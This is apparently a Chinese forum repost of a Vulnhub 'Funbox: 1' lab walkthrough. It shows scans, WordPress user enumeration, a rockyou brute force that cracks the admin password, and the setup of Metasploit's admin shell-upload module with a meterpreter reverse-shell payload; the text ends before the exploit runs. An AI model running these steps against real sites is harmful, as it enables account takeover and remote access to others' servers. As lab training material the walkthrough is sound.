ToB企服应用市场:ToB评测及商务社交产业平台

标题: Vulnhub之Funbox 1靶机详细测试过程 [打印本页]

---

作者: 郭卫东    时间: 2023-5-8 19:36
标题: Vulnhub之Funbox 1靶机详细测试过程
Funbox

作者：jason_huawen
靶机信息

名称：Funbox: 1
地址：

1. https://www.vulnhub.com/entry/funbox-1,518/

复制代码

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:c7:64:09      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.164  08:00:27:a7:af:87      1      60  PCS Systemtechnik GmbH           

复制代码

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164
NMAP扫描

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.164 -oN nmap_full_scan
3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-10 21:17 EST
4. Nmap scan report for bogon (192.168.56.164)
5. Host is up (0.00013s latency).
6. Not shown: 65531 closed tcp ports (reset)
7. PORT      STATE SERVICE VERSION
8. 21/tcp    open  ftp     ProFTPD
9. 22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
10. | ssh-hostkey:
11. |   3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
12. |   256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
13. |_  256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
14. 80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
15. |_http-server-header: Apache/2.4.41 (Ubuntu)
16. |_http-title: Did not follow redirect to http://funbox.fritz.box/
17. | http-robots.txt: 1 disallowed entry
18. |_/secret/
19. 33060/tcp open  mysqlx?
20. | fingerprint-strings:
21. |   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
22. |     Invalid message"
23. |_    HY000
24. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
25. SF-Port33060-TCP:V=7.92%I=7%D=1/10%Time=63BE1C3F%P=x86_64-pc-linux-gnu%r(N
26. SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
27. SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
28. SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
29. SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
30. SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
31. SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
32. SF:nvalid\x20message"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
33. SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
34. SF:\x10\x88'\x1a\x0fInvalid\x20message"\x05HY000")%r(TerminalServerCookie
35. SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
36. SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"
37. SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
38. SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
39. SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"\x05HY0
40. SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
41. SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
42. SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"\
43. SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
44. SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
45. SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
46. SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
47. SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"\x05HY000
48. SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
49. SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
50. SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
51. SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"\
52. SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
53. MAC Address: 08:00:27:A7:AF:87 (Oracle VirtualBox virtual NIC)
54. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
56. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
57. Nmap done: 1 IP address (1 host up) scanned in 26.83 seconds

复制代码

NMAP扫描结果表明目标主机有4个开放端口：21（FTP）、22（SSH）、80（HTTP)、33060(Mysqlx?)
获得Shell

21端口

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$ ftp 192.168.56.164
3. Connected to 192.168.56.164.
4. 220 ProFTPD Server (Debian) [::ffff:192.168.56.164]
5. Name (192.168.56.164:kali): anonymous
6. 331 Password required for anonymous
7. Password:
8. 530 Login incorrect.
9. ftp: Login failed
10. ftp> quit
11. 221 Goodbye.

复制代码

• 目标主机不允许匿名访问；
  
• FTP服务软件维ProFTDd，但版本未知
  

80端口

Kali Linux上浏览器访问80端口，返回错误，发现指向了funbox.fritz.box，将其加入/etc/hosts文件中：

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$ sudo vim /etc/hosts                                       
3.                                                                                                                              
4. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
5. └─$ cat /etc/hosts
6. 127.0.0.1       localhost
7. 127.0.1.1       kali
8. ::1             localhost ip6-localhost ip6-loopback
9. ff02::1         ip6-allnodes
10. ff02::2         ip6-allrouters
11. 192.168.56.164  funbox.fritz.box

复制代码

刷新页面，从返回页面得知为wordpress站点。

1.                                                                                                                              
2. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
3. └─$ curl http://funbox.fritz.box/robots.txt
4. Disallow: /secret/
5.                                                                                                                              
6. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
7. └─$ curl http://funbox.fritz.box/secret/   
8. No secrets here. Try harder !
9.                                  

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$ nikto -h http://192.168.56.164
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.164
6. + Target Hostname:    192.168.56.164
7. + Target Port:        80
8. + Start Time:         2023-01-10 21:26:11 (GMT-5)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.41 (Ubuntu)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + Uncommon header 'x-redirect-by' found, with contents: WordPress
14. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
15. + Root page / redirects to: http://funbox.fritz.box/
16. + Uncommon header 'link' found, with multiple values: (<http://funbox.fritz.box/index.php/wp-json/>; rel="https://api.w.org/",<http://funbox.fritz.box/>; rel=shortlink,)
17. + No CGI Directories found (use '-C all' to force check all possible dirs)
18. + Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
19. + "robots.txt" contains 1 entry which should be manually viewed.
20. + Multiple index files found: /index.php, /default.htm
21. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
22. + OSVDB-3092: /secret/: This might be interesting...
23. + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
24. + /wp-links-opml.php: This WordPress script reveals the installed version.
25. + OSVDB-3092: /license.txt: License file found may identify site software.
26. + Cookie wordpress_test_cookie created without the httponly flag
27. + OSVDB-3268: /wp-content/uploads/: Directory indexing found.
28. + /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
29. + /wp-login.php: Wordpress login found
30. + 7916 requests: 0 error(s) and 17 item(s) reported on remote host
31. + End Time:           2023-01-10 21:27:20 (GMT-5) (69 seconds)
32. ---------------------------------------------------------------------------
33. + 1 host(s) tested
36.       *********************************************************************
37.       Portions of the server's headers (Apache/2.4.41) are not in
38.       the Nikto 2.1.6 database or are newer than the known string. Would you like
39.       to submit this information (*no server specific data*) to CIRT.net
40.       for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

复制代码

nikto工具发现了wordpress管理后台，再尝试用wpscan工具之前，先扫描一下有无其他可利用的目录或者文件。

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
3. ===============================================================
4. Gobuster v3.4
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.164
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.4
13. [+] Timeout:                 10s
14. ===============================================================
15. 2023/01/10 21:28:50 Starting gobuster in directory enumeration mode
16. ===============================================================
17. /wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.164/wp-content/]
18. /wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.164/wp-includes/]
19. /secret               (Status: 301) [Size: 317] [--> http://192.168.56.164/secret/]
20. /wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.164/wp-admin/]
21. /server-status        (Status: 403) [Size: 279]
22. Progress: 220410 / 220561 (99.93%)
23. ===============================================================
24. 2023/01/10 21:29:32 Finished
25. ===============================================================
26.                                                                                                                              
27. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
28. └─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
29. ===============================================================
30. Gobuster v3.4
31. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
32. ===============================================================
33. [+] Url:                     http://192.168.56.164
34. [+] Method:                  GET
35. [+] Threads:                 10
36. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
37. [+] Negative Status codes:   404
38. [+] User Agent:              gobuster/3.4
39. [+] Extensions:              php,js,html,txt,sh
40. [+] Timeout:                 10s
41. ===============================================================
42. 2023/01/10 21:29:43 Starting gobuster in directory enumeration mode
43. ===============================================================
44. /.html                (Status: 403) [Size: 279]
45. /.php                 (Status: 403) [Size: 279]
46. /index.php            (Status: 200) [Size: 61294]
47. /wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.164/wp-content/]
48. /wp-login.php         (Status: 200) [Size: 4502]
49. /license.txt          (Status: 200) [Size: 19915]
50. /wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.164/wp-includes/]
51. /readme.html          (Status: 200) [Size: 7278]
52. /robots.txt           (Status: 200) [Size: 19]
53. /secret               (Status: 301) [Size: 317] [--> http://192.168.56.164/secret/]
54. /wp-trackback.php     (Status: 200) [Size: 135]
55. /wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.164/wp-admin/]
56. /xmlrpc.php           (Status: 405) [Size: 42]
57. /.php                 (Status: 403) [Size: 279]
58. /.html                (Status: 403) [Size: 279]
59. /wp-signup.php        (Status: 302) [Size: 0] [--> http://funbox.fritz.box/wp-login.php?action=register]
60. /server-status        (Status: 403) [Size: 279]
61. Progress: 1322235 / 1323366 (99.91%)
62. ===============================================================
63. 2023/01/10 21:34:31 Finished
64. ===============================================================
65.                                                                                                                              
66. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
67. └─$ dirb http://192.168.56.164
69. -----------------
70. DIRB v2.22   
71. By The Dark Raver
72. -----------------
74. START_TIME: Tue Jan 10 21:34:37 2023
75. URL_BASE: http://192.168.56.164/
76. WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
78. -----------------
80. GENERATED WORDS: 4612                                                         
82. ---- Scanning URL: http://192.168.56.164/ ----
83. + http://192.168.56.164/index.php (CODE:200|SIZE:61294)                                                                     
84. + http://192.168.56.164/robots.txt (CODE:200|SIZE:19)                                                                       
85. ==> DIRECTORY: http://192.168.56.164/secret/                                                                                
86. + http://192.168.56.164/server-status (CODE:403|SIZE:279)                                                                  
87. ==> DIRECTORY: http://192.168.56.164/wp-admin/                                                                              
88. ==> DIRECTORY: http://192.168.56.164/wp-content/                                                                           
89. ==> DIRECTORY: http://192.168.56.164/wp-includes/                                                                           
90. + http://192.168.56.164/xmlrpc.php (CODE:405|SIZE:42)                                                                       
91.                                                                                                                            
92. ---- Entering directory: http://192.168.56.164/secret/ ----
93. + http://192.168.56.164/secret/index.html (CODE:200|SIZE:30)                                                               
94.                                                                                                                            
95. ---- Entering directory: http://192.168.56.164/wp-admin/ ----
96. + http://192.168.56.164/wp-admin/admin.php (CODE:302|SIZE:0)                                                               
97. ==> DIRECTORY: http://192.168.56.164/wp-admin/css/                                                                          
98. ==> DIRECTORY: http://192.168.56.164/wp-admin/images/                                                                       
99. ==> DIRECTORY: http://192.168.56.164/wp-admin/includes/                                                                     
100. + http://192.168.56.164/wp-admin/index.php (CODE:302|SIZE:0)                                                               
101. ==> DIRECTORY: http://192.168.56.164/wp-admin/js/                                                                           
102. ==> DIRECTORY: http://192.168.56.164/wp-admin/maint/                                                                        
103. ==> DIRECTORY: http://192.168.56.164/wp-admin/network/                                                                     
104. ==> DIRECTORY: http://192.168.56.164/wp-admin/user/                                                                        
105.                                                                                                                            
106. ---- Entering directory: http://192.168.56.164/wp-content/ ----
107. + http://192.168.56.164/wp-content/index.php (CODE:200|SIZE:0)                                                              
108. ==> DIRECTORY: http://192.168.56.164/wp-content/plugins/                                                                    
109. ==> DIRECTORY: http://192.168.56.164/wp-content/themes/                                                                     
110. ==> DIRECTORY: http://192.168.56.164/wp-content/upgrade/                                                                    
111. ==> DIRECTORY: http://192.168.56.164/wp-content/uploads/                                                                    
112.                                                                                                                            
113. ---- Entering directory: http://192.168.56.164/wp-includes/ ----
114. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
115.     (Use mode '-w' if you want to scan it anyway)
116.                                                                                                                            
117. ---- Entering directory: http://192.168.56.164/wp-admin/css/ ----
118. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
119.     (Use mode '-w' if you want to scan it anyway)
120.                                                                                                                            
121. ---- Entering directory: http://192.168.56.164/wp-admin/images/ ----
122. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
123.     (Use mode '-w' if you want to scan it anyway)
124.                                                                                                                            
125. ---- Entering directory: http://192.168.56.164/wp-admin/includes/ ----
126. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
127.     (Use mode '-w' if you want to scan it anyway)
128.                                                                                                                            
129. ---- Entering directory: http://192.168.56.164/wp-admin/js/ ----
130. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
131.     (Use mode '-w' if you want to scan it anyway)
132.                                                                                                                            
133. ---- Entering directory: http://192.168.56.164/wp-admin/maint/ ----
134. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
135.     (Use mode '-w' if you want to scan it anyway)
136.                                                                                                                            
137. ---- Entering directory: http://192.168.56.164/wp-admin/network/ ----
138. + http://192.168.56.164/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                        
139. + http://192.168.56.164/wp-admin/network/index.php (CODE:302|SIZE:0)                                                        
140.                                                                                                                            
141. ---- Entering directory: http://192.168.56.164/wp-admin/user/ ----
142. + http://192.168.56.164/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                           
143. + http://192.168.56.164/wp-admin/user/index.php (CODE:302|SIZE:0)                                                           
144.                                                                                                                            
145. ---- Entering directory: http://192.168.56.164/wp-content/plugins/ ----
146. + http://192.168.56.164/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                      
147.                                                                                                                            
148. ---- Entering directory: http://192.168.56.164/wp-content/themes/ ----
149. + http://192.168.56.164/wp-content/themes/index.php (CODE:200|SIZE:0)                                                      
150.                                                                                                                            
151. ---- Entering directory: http://192.168.56.164/wp-content/upgrade/ ----
152. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
153.     (Use mode '-w' if you want to scan it anyway)
154.                                                                                                                            
155. ---- Entering directory: http://192.168.56.164/wp-content/uploads/ ----
156. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
157.     (Use mode '-w' if you want to scan it anyway)
158.                                                                               
159. -----------------
160. END_TIME: Tue Jan 10 21:34:57 2023
161. DOWNLOADED: 36896 - FOUND: 14

复制代码

gobuster或者dirb没有扫描出更多有价值的目录或者文件。

1.                                                                                                                              
2. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
3. └─$ wpscan --url http://funbox.fritz.box/ -e u,p                          
4. _______________________________________________________________
5.          __          _______   _____
6.          \ \        / /  __ \ / ____|
7.           \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
8.            \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
9.             \  /\  /  | |     ____) | (__| (_| | | | |
10.              \/  \/   |_|    |_____/ \___|\__,_|_| |_|
12.          WordPress Security Scanner by the WPScan Team
13.                          Version 3.8.22
14.        Sponsored by Automattic - https://automattic.com/
15.        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
16. _______________________________________________________________
18. [+] URL: http://funbox.fritz.box/ [192.168.56.164]
19. [+] Started: Tue Jan 10 21:36:24 2023
21. Interesting Finding(s):
23. [+] Headers
24. | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
25. | Found By: Headers (Passive Detection)
26. | Confidence: 100%
28. [+] robots.txt found: http://funbox.fritz.box/robots.txt
29. | Found By: Robots Txt (Aggressive Detection)
30. | Confidence: 100%
32. [+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
33. | Found By: Direct Access (Aggressive Detection)
34. | Confidence: 100%
35. | References:
36. |  - http://codex.wordpress.org/XML-RPC_Pingback_API
37. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
38. |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
39. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
40. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
42. [+] WordPress readme found: http://funbox.fritz.box/readme.html
43. | Found By: Direct Access (Aggressive Detection)
44. | Confidence: 100%
46. [+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
47. | Found By: Direct Access (Aggressive Detection)
48. | Confidence: 100%
50. [+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
51. | Found By: Direct Access (Aggressive Detection)
52. | Confidence: 60%
53. | References:
54. |  - https://www.iplocation.net/defend-wordpress-from-ddos
55. |  - https://github.com/wpscanteam/wpscan/issues/1299
57. [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
58. | Found By: Rss Generator (Passive Detection)
59. |  - http://funbox.fritz.box/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
60. |  - http://funbox.fritz.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
62. [+] WordPress theme in use: twentyseventeen
63. | Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
64. | Last Updated: 2022-11-02T00:00:00.000Z
65. | Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
66. | [!] The version is out of date, the latest version is 3.1
67. | Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
68. | Style Name: Twenty Seventeen
69. | Style URI: https://wordpress.org/themes/twentyseventeen/
70. | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
71. | Author: the WordPress team
72. | Author URI: https://wordpress.org/
73. |
74. | Found By: Css Style In Homepage (Passive Detection)
75. |
76. | Version: 2.3 (80% confidence)
77. | Found By: Style (Passive Detection)
78. |  - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
80. [+] Enumerating Most Popular Plugins (via Passive Methods)
82. [i] No plugins Found.
84. [+] Enumerating Users (via Passive and Aggressive Methods)
85. Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
87. [i] User(s) Identified:
89. [+] admin
90. | Found By: Author Posts - Author Pattern (Passive Detection)
91. | Confirmed By:
92. |  Rss Generator (Passive Detection)
93. |  Wp Json Api (Aggressive Detection)
94. |   - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
95. |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
96. |  Login Error Messages (Aggressive Detection)
98. [+] joe
99. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
100. | Confirmed By: Login Error Messages (Aggressive Detection)
102. [!] No WPScan API Token given, as a result vulnerability data has not been output.
103. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
105. [+] Finished: Tue Jan 10 21:36:34 2023
106. [+] Requests Done: 57
107. [+] Cached Requests: 8
108. [+] Data Sent: 14.838 KB
109. [+] Data Received: 573.9 KB
110. [+] Memory used: 239.93 MB
111. [+] Elapsed time: 00:00:09

复制代码

wpscan扫描出用户：admin    joe，接下来看是否可以破解admin的密码？

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
2. └─$ wpscan --url http://funbox.fritz.box/ -U admin -P /usr/share/wordlists/rockyou.txt
3. _______________________________________________________________
4.          __          _______   _____
5.          \ \        / /  __ \ / ____|
6.           \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
7.            \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
8.             \  /\  /  | |     ____) | (__| (_| | | | |
9.              \/  \/   |_|    |_____/ \___|\__,_|_| |_|
11.          WordPress Security Scanner by the WPScan Team
12.                          Version 3.8.22
13.        Sponsored by Automattic - https://automattic.com/
14.        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
15. _______________________________________________________________
17. [+] URL: http://funbox.fritz.box/ [192.168.56.164]
18. [+] Started: Tue Jan 10 21:36:56 2023
20. Interesting Finding(s):
22. [+] Headers
23. | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
24. | Found By: Headers (Passive Detection)
25. | Confidence: 100%
27. [+] robots.txt found: http://funbox.fritz.box/robots.txt
28. | Found By: Robots Txt (Aggressive Detection)
29. | Confidence: 100%
31. [+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
32. | Found By: Direct Access (Aggressive Detection)
33. | Confidence: 100%
34. | References:
35. |  - http://codex.wordpress.org/XML-RPC_Pingback_API
36. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
37. |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
38. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
39. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
41. [+] WordPress readme found: http://funbox.fritz.box/readme.html
42. | Found By: Direct Access (Aggressive Detection)
43. | Confidence: 100%
45. [+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
46. | Found By: Direct Access (Aggressive Detection)
47. | Confidence: 100%
49. [+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
50. | Found By: Direct Access (Aggressive Detection)
51. | Confidence: 60%
52. | References:
53. |  - https://www.iplocation.net/defend-wordpress-from-ddos
54. |  - https://github.com/wpscanteam/wpscan/issues/1299
56. [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
57. | Found By: Rss Generator (Passive Detection)
58. |  - http://funbox.fritz.box/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
59. |  - http://funbox.fritz.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
61. [+] WordPress theme in use: twentyseventeen
62. | Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
63. | Last Updated: 2022-11-02T00:00:00.000Z
64. | Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
65. | [!] The version is out of date, the latest version is 3.1
66. | Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
67. | Style Name: Twenty Seventeen
68. | Style URI: https://wordpress.org/themes/twentyseventeen/
69. | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
70. | Author: the WordPress team
71. | Author URI: https://wordpress.org/
72. |
73. | Found By: Css Style In Homepage (Passive Detection)
74. |
75. | Version: 2.3 (80% confidence)
76. | Found By: Style (Passive Detection)
77. |  - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
79. [+] Enumerating All Plugins (via Passive Methods)
81. [i] No plugins Found.
83. [+] Enumerating Config Backups (via Passive and Aggressive Methods)
84. Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
86. [i] No Config Backups Found.
88. [+] Performing password attack on Wp Login against 1 user/s
89. [SUCCESS] - admin / iubire                                                                                                   
90. Trying admin / iubire Time: 00:00:11 <                                               > (665 / 14345057)  0.00%  ETA: ??:??:??
92. [!] Valid Combinations Found:
93. | Username: admin, Password: iubire
95. [!] No WPScan API Token given, as a result vulnerability data has not been output.
96. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
98. [+] Finished: Tue Jan 10 21:37:24 2023
99. [+] Requests Done: 806
100. [+] Cached Requests: 38
101. [+] Data Sent: 265.434 KB
102. [+] Data Received: 3.374 MB
103. [+] Memory used: 287.012 MB
104. [+] Elapsed time: 00:00:27

复制代码

用破解得到的用户名和密码登录wordpress后台。
当尝试修改404模板时，update file，返回错误：

1. Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

复制代码

看来通过修改404模板的方式不可行，需要看一下其他方式。

1. msf6 > search wp_admin
3. Matching Modules
4. ================
6.    #  Name                                       Disclosure Date  Rank       Check  Description
7.    -  ----                                       ---------------  ----       -----  -----------
8.    0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload
11. Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
13. msf6 > use exploit/unix/webapp/wp_admin_shell_upload
14. [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
15. msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
17. Module options (exploit/unix/webapp/wp_admin_shell_upload):
19.    Name       Current Setting  Required  Description
20.    ----       ---------------  --------  -----------
21.    PASSWORD                    yes       The WordPress password to authenticate with
22.    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
23.    RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
24.                                          etasploit
25.    RPORT      80               yes       The target port (TCP)
26.    SSL        false            no        Negotiate SSL/TLS for outgoing connections
27.    TARGETURI  /                yes       The base path to the wordpress application
28.    USERNAME                    yes       The WordPress username to authenticate with
29.    VHOST                       no        HTTP server virtual host
32. Payload options (php/meterpreter/reverse_tcp):
34.    Name   Current Setting  Required  Description
35.    ----   ---------------  --------  -----------
36.    LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
37.    LPORT  4444             yes       The listen port
40. Exploit target:
42.    Id  Name
43.    --  ----
44.    0   WordPress
47. msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT  5555
48. LPORT => 5555
49. msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST  192.168.56.146
50. LHOST => 192.168.56.146
51. msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.164
52. RHOSTS => 192.168.56.164
